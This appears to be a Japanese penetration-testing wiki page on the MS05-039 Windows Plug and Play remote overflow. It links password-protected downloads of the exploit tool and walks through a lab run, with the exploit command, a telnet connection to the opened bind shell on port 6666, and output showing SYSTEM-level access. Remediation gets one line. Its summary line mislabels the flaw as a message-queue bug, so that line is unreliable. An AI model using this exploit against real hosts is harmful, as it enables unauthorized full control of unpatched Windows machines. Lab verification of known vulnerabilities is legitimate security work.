[[exploit:remote:windows:ms05-039]]
 
トレース: » Tripwire 初期設定 » php-syslog-ng (syslog管理用Webインターフェース) » MS05-002:カーソルおよびアイコンのフォーマットの処理の脆弱性により、リモートでコードが実行される » MS03-026:RPC インターフェイスのバッファ オーバーランによりコードが実行される » Cookie Stealer (PHP版) » Prelude-IDS センサーの追加 - Snort (侵入検知) » Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit » MS06-001:Graphics Rendering Engine の脆弱性によりコードが実行される可能性がある » MS05-039:WINS の脆弱性により、リモートでコードが実行される » MS05-039:プラグ アンド プレイ の脆弱性により、リモートでコードが実行され、特権の昇格が行なわれる
目次

MS05-039:プラグ アンド プレイ の脆弱性により、リモートでコードが実行され、特権の昇格が行なわれる

更新履歴

  • 2006/02/24 GUI版添付ファイル及び備考へスクリーンショット追加
  • 2006/02/19 初版

概要

  • メッセージ キューの脆弱性に対するExploit
  • このExploitを使用すると、任意のポートでコマンドシェルをオープンさせることが可能

影響を受けるシステム

  • Microsoft Windows 2000 Service Pack 3 および Microsoft Windows 2000 Service Pack 4
  • Microsoft Windows XP Service Pack 1
  • Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium)
  • Microsoft Windows 98 および Microsoft Windows 98 Second Edition (SE)

影響を受けないシステム

  • Microsoft Windows XP Service Pack 2
  • Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)
  • Microsoft Windows Server 2003 および Windows Server 2003 Service Pack 1
  • Microsoft Windows Server 2003 for Itanium-based Systems
  • Microsoft Windows Millennium Edition (ME)

添付ファイル

files password
ms05039_2.zip pen-test
files password
ms05039gui.zip pen-test

参考URL

Exploitの検証

検証環境

  • Windows2000 Advanced Server SP4 日本語版
  • Windows2000 Server SP4 日本語版

検証結果

  • 攻撃元IPアドレス: 192.168.1.2(OS Windows XP SP1)
  • 攻撃先IPアドレス: 192.168.1.250(PC名 2000ad)
  • 攻撃元からExploitコードを実行する。
C:\console-tool\exploit\win\ms05039_#2>ms05039_2.exe 192.168.1.250 6666

 (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
         Universal Exploit + no crash shellcode


         Copyright (c) 2005 .: houseofdabus :.



[*] connecting to 192.168.1.250:445...ok
[*] null session...ok
[*] bind pipe...ok
[*] sending crafted packet...ok
[*] check your shell on 192.168.1.250:6666
  • Exploitを実行したコマンドプロンプトとは別のプロンプトを開き、telnetでExploitによりオープンさせたポートへ接続を行う。この検証ではtcp/6666ポートをオープンさせた。
  • telnetで攻撃対象のtcp/6666へ接続を行う。
telnet 192.168.1.250 6666
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>whoami
whoami
NT AUTHORITY\SYSTEM

C:\WINNT\system32>hostname
hostname
2000ad

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter ローカル エリア接続:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.1.250
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.1.1

対処方法

  1. MS05-039 パッチの適用 (Windows Update の実施)

備考

  • Windows 2000 Advanced Server SP2 に対してExploitを実行すると「システムのシャットダウン」が発生しました。
  • GUI版のものもリリースされており同様の結果を得ることができました。

ms05039gui.jpg

 
exploit/remote/windows/ms05-039.txt · 最終更新: 2007/10/16 12:02
 
Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki NINJA TOOLS